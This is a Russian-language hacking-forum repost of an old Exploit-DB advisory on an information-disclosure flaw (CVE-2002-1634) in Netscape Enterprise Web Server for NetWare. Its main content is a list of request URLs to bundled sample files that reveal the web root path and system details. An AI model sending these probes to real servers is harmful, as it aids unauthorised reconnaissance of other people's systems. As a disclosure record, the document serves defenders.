Exploit Netscape Enterprise Web Server for Netware 4/5 5.0 - Information Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21488
Проверка EDB
  1. Пройдено
Автор
PROCHECKUP
Тип уязвимости
REMOTE
Платформа
NOVELL
CVE
cve-2002-1634
Дата публикации
2002-05-29
Код:
source: https://www.securityfocus.com/bid/4874/info

It has been reported that Netscape Enterprise Web Server may disclose path and system information to a remote user.

Netscape Enterprise Web Server for Netware contain several sample files which leak system information, this information can be obtained by remote users.

An attacker is able to send a request, for an affected sample file, that will cause the host to disclose the location of the web root path. Certain sample files will also reveal detailed system specific information. 

http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse

http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse

http://webserver/perl/samples/env.pl

http://webserver/perl/samples/lancgi.pl

http://webserver/perl/samples/volscgi.pl

http://webserver/perl/samples/ndslogin.pl

http://webserver/netbasic/websinfo.bas
 
Источник
www.exploit-db.com

Похожие темы